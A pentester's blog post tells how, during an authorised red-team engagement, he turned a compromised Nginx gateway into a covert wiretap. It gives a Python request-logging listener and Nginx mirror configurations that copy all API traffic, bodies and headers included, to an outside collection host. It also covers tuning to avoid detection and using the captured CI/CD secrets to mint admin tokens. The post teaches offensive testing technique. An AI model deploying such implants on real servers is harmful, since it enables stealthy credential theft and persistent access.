
My secret to API privesc: Tapping compromised web servers

It was about three in the afternoon on a Friday. Of course it was.

The spring rain was beating down with a weird cadence, like drummers were marching us into the weekend. Hey, it’s the Pacific Northwest. This is normal.

I was tired. All week, I had been helping a client with a pentest of a new SaaS service that was about to go into production. I had made good progress, getting a foothold on the frontend Nginx server that routed all their APIs.

But pivoting was getting difficult.

Until I decided to play by a different set of rules.

Yep… you just got Rick rolled 🤣

Security (mis)configuration

I was thinking about the OWASP API Security Top 10, which gave me an idea. One of the top 10 categories is always about security misconfiguration. Usually, it’s about missing patches, out-of-date systems, or security hardening that hasn’t been applied to things like CORS policies or TLS requirements.

But another weakness many people don’t think about in the security misconfiguration category is leaving unnecessary “features” enabled in the web server.

This got me thinking. What could we do with the access I had to Nginx?

I had already thought about capturing traffic with tcpdump, but I didn’t have the privileges on the server to put an interface into promiscuous mode. And the server was resource-starved, with almost no disk space, so proxying traffic and storing it locally wasn’t a practical option.

What else could I do? What would a real malicious actor do?

Thinking like the bad guy

Earlier in the week, I came across an article about how state actors like to drop implants on servers they compromise and come back to them later.

One of the persistence techniques was to inject a benign-looking Apache module that lay dormant until it detected a specific HTTP request sequence. When it saw such a request, it would spring into action and open a backdoor to the server.

But I didn’t have Apache here. It was Nginx. Did it support any sort of construct like this?

RTFM

I decided the best way to understand what Nginx could do was to go read the docs. I already had the basics down and understood how Nginx worked as an API gateway proxy.

But wow… it could do a whole lot more.

It’s a content cache. A reverse proxy. A web accelerator. A load balancer. The list goes on and on.

And, to my instant delight, it can do out-of-band mirroring.

You know… mirroring. Taking inbound requests and sending a copy somewhere else to be captured, without impacting the actual production service. It’s a friggin’ wiretap built right into the server, ideal for persistent implants.

This could be fun.

Building a badass implant listener

So Nginx could mirror inbound traffic. But there has to be something listening on the other end that can collect the mirrored data.

Sure, pretty much any kind of HTTP server should be able to do that. But if it’s not purpose-built, it might hang connections or return the wrong status codes when the request paths don’t match.

A bit of Python can do the trick. Just capture any request sent, dump it into a file to review later, and return a success code. It could be something as simple as this script I wrote.
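
Something along these lines works as a minimal sketch, using only the Python standard library (the port and log path here are placeholders, not the exact script from the engagement):

    # listener.py -- minimal sketch: log every request, always return 200.
    from datetime import datetime, timezone
    from http.server import BaseHTTPRequestHandler, HTTPServer

    LOG_FILE = "captured_requests.log"   # placeholder path

    class CaptureHandler(BaseHTTPRequestHandler):
        def _capture(self):
            # Read the body (if any) without hanging on the connection.
            length = int(self.headers.get("Content-Length", 0) or 0)
            body = self.rfile.read(length) if length else b""

            # Append method, path, headers, and body to the log file.
            with open(LOG_FILE, "ab") as log:
                stamp = datetime.now(timezone.utc).isoformat()
                log.write(f"--- {stamp} {self.client_address[0]} ---\n".encode())
                log.write(f"{self.command} {self.path}\n".encode())
                log.write(str(self.headers).encode())
                log.write(body + b"\n")

            # Answer fast with a success code so the mirror never stalls.
            self.send_response(200)
            self.end_headers()

        # Mirrored traffic can arrive with any verb; capture them all.
        do_GET = do_POST = do_PUT = do_PATCH = do_DELETE = _capture

        def log_message(self, fmt, *args):
            pass  # keep the console quiet

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8080), CaptureHandler).serve_forever()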

I don’t want to record all traffic, so I added some Content-Type filtering to capture only JSON or form data, plus a filter that drops traffic from any inbound IP except the implants I want to listen to.
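
In the sketch above, those checks might look like this (the allowlist address and content types are placeholder assumptions):

    # Placeholder allowlist and content types, bolted onto the sketch above.
    ALLOWED_IPS = {"203.0.113.10"}        # the compromised Nginx host(s)
    CAPTURED_TYPES = ("application/json",
                      "application/x-www-form-urlencoded",
                      "multipart/form-data")

    def should_capture(client_ip, content_type):
        # Record only implant traffic carrying JSON or form payloads.
        return (client_ip in ALLOWED_IPS
                and content_type.startswith(CAPTURED_TYPES))

    # Inside _capture, before writing anything to disk:
    #     if not should_capture(self.client_address[0],
    #                           self.headers.get("Content-Type", "")):
    #         self.send_response(200)   # stay quiet, drop the data
    #         self.end_headers()
    #         return

Filtered requests still get a quick 200 back, so nothing looks broken from the Nginx side.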

It works pretty well most of the time. I later rewrote the listener to be multithreaded and to store each implant’s content in its own file, which makes data management easier.

But that’s a discussion for another day.

With my implant listener now logging all relevant requests, it was time to tap Nginx.

Tapping Nginx

When I first stumbled upon the mirror feature in Nginx, it looked simple enough. But I tripped up a few times once I started actually using it.

The documentation was rather clear. You basically set the mirror directive on the location(s) you want to mirror and route them through another internal location that proxies to your listener. The configuration looks something like this (the addresses are placeholders; the pattern follows the ngx_http_mirror_module docs):
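
    location /api/ {
        mirror /_tap;                 # duplicate each request as a subrequest
        mirror_request_body on;       # include POST/PUT bodies in the copy
        proxy_pass http://10.0.0.20:8000;               # the real backend
    }

    location = /_tap {
        internal;                     # not reachable from the outside
        proxy_pass http://192.0.2.50:8080$request_uri;  # implant listener
    }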

This configuration creates a mirror subrequest for every inbound request and ignores the response.

Here was where I hit my first stumbling block. It turns out it’s not that easy. Jitter and delays between the servers would slow down the production requests. Noticeably.

Timeout hell kills Nginx

While I was testing this on my own ephemeral resources, I could see delays when the mirror failed in some way. My original Python code was slow and handled one request at a time. Nginx would basically throttle the production connections to the real API endpoints while waiting for responses.

Worse yet, if I didn’t start the implant listener before Nginx, Nginx itself would fail to start, eventually dying with an “Upstream host is unavailable” error message.

As this was a red team pentest engagement, we didn’t want to be detected at this point. So this configuration was unacceptable.

The blue team didn’t know we had a foothold on the Nginx servers yet, and we did NOT want to slow down the API or prevent Nginx from functioning, which might alert them to our presence.

It turns out these edge-case timeouts were a known issue. They could be fixed by setting a local resolver and aggressive proxy timeouts.

So the configuration needed to be updated. Something like this (the resolver address, listener hostname, and timeout values are illustrative):
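
    location = /_tap {
        internal;

        # Resolve the listener at runtime via a local resolver (placeholder
        # address) instead of once at startup.
        resolver 127.0.0.1 valid=30s;
        set $tap_host tap.listener.internal;   # listener host in a variable

        proxy_pass http://$tap_host:8080$request_uri;

        # Fail fast so a slow or dead mirror can't drag down production.
        proxy_connect_timeout 250ms;
        proxy_read_timeout 500ms;
        proxy_send_timeout 500ms;
    }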

This workaround uses a dedicated ‘local’ resolver for the upstream implant listener and stores its hostname in a variable we can reference in the mirror config. Because Nginx resolves variables at runtime rather than at startup, a dead listener no longer keeps it from booting. We also tune the proxy connection timeouts so Nginx fails fast instead of stalling production requests.

With that now reliably working, we can tune what we are mirroring to get useful information that may help us pivot.

Configuring the mirroring to capture API requests

I had one last thing I wanted to do. And that was to make sure I was mirroring EVERYTHING I needed to gain deeper operational insights into the API services we were testing. It was here that I leveraged some of the tactics API security testing vendors use to capture traffic for security analysis.

Companies like Salt Security and Wallarm have been mirroring API endpoints for years. Why not take a page from their playbook and turn it to our advantage?

Like this Wallarm documentation. It explains perfectly how to set up the Nginx configuration to collect the most information, giving us a more mature configuration to collect all the API requests we want. The mirror config looks something like this now (modeled loosely on Wallarm’s published example; addresses and header choices are placeholders):
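
    location / {
        mirror /_tap;
        mirror_request_body on;            # capture request bodies too
        proxy_pass http://10.0.0.20:8000;  # production backend (placeholder)
    }

    location = /_tap {
        internal;
        resolver 127.0.0.1 valid=30s;
        set $tap_host tap.listener.internal;   # destination IP/domain
        proxy_pass http://$tap_host:8080$request_uri;
        proxy_connect_timeout 250ms;
        proxy_read_timeout 500ms;

        # Forward the details the listener needs to reconstruct each request.
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Request-ID $request_id;
    }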

And with that, we have mirrored traffic flowing to the implant listener, the headers to be forwarded listed out, and the destination IP address or domain name of the collection machine specified.

I moved everything to the production servers and watched my listener start recording my traffic as I launched a small Postman Collection Runner test suite.

Sweet. Success. Time to show everyone the tap I just built.

The results

In my excitement building all this out, I didn’t realize it was now early Friday evening. The office was a ghost town; it seemed everyone had left for the weekend. Where the heck did the last few hours go? And why didn’t anyone bang on my door and say goodbye?

How rude.

I decided to leave everything running and headed home. I figured I’d pick up where I left off on Monday when everyone was back in the office.

And boy, was Monday morning a blast.

As soon as I sat down and looked at the data on my implant listener server, I saw gigabytes of log data.

WTF?

Unbeknownst to us all, the blue team had pushed new versions of everything over the weekend, including a couple of services we hadn’t found during our initial recon.

The one that excited me was an app token exchange endpoint that was designed to be used internally to mint administrative tokens for all the backend services. It was only used during blue/green deployments to help automate their CI/CD pipeline as they transitioned between staging and production.

You gotta love it when people automate DevOps using APIs. Why this was going through the front-end Nginx servers was just bonkers to me.

But I digress.

The request logger stored all the data I needed. I had collected the application client ID and secret of the CI/CD pipeline process, along with all the special headers required to communicate between services to forge administrative tokens. And thanks to the weekend updates (go blue team!), I had all the info to use this token exchange service and gain administrative access to every host on the cluster.

All thanks to this little tap.

Game over.

Post-mortem years later

Looking back on this, I realize I now have several weapons in my arsenal that came from the experience gained during this engagement.

I now have custom modules and/or workflows for Apache, IIS, Tomcat, Kestrel, and Flask that mirror traffic and dump API requests to my request listeners. And it’s one of the first things I do once I gain a foothold on a web server.

It has led to several different privesc options over the years.

I also now run my listeners serverless and dump to table storage, so managing all the data during an engagement is easier. And I only pay for compute as it’s used, so it’s much easier to know which client to bill.

Except for that one time when a client’s blue team restored a service from backup and accidentally reinstalled one of my implants while I was away on holiday, triggering one of their new IDS sensors and causing a real stir in their SOC.

That is a story for another day.

Conclusion

I don’t share this story to impress you but to impress upon you that when conducting API pentests, you sometimes need to think outside the box.

API privesc can be tricky. But if you have an opportunity to tap compromised apps and infrastructure, you may gain operational insights that can lead you to that privilege escalation you are looking for.

I’m sure I don’t have to state the obvious, but this is aggressive. You should only be doing this with permission from your client, and you had better know what you’re doing. Hopefully, you can do this in a non-production environment to avoid causing critical business impact.

Ensure you have emergency contact information for the blue team to communicate with them if you screw something up. And above all else, be nice.

The red team usually has a bad rep as it is… giving more work to the blue team when you break something is never a good thing. Especially when a weekend is approaching. 🤣

One last thing…

API Hacker Inner Circle

The API Hacker Inner Circle is growing. It’s my FREE weekly newsletter where I share articles like this, along with pro tips, industry insights, and community news that I don’t tend to share publicly. If you haven’t yet, join us by subscribing at https://apihacker.blog.
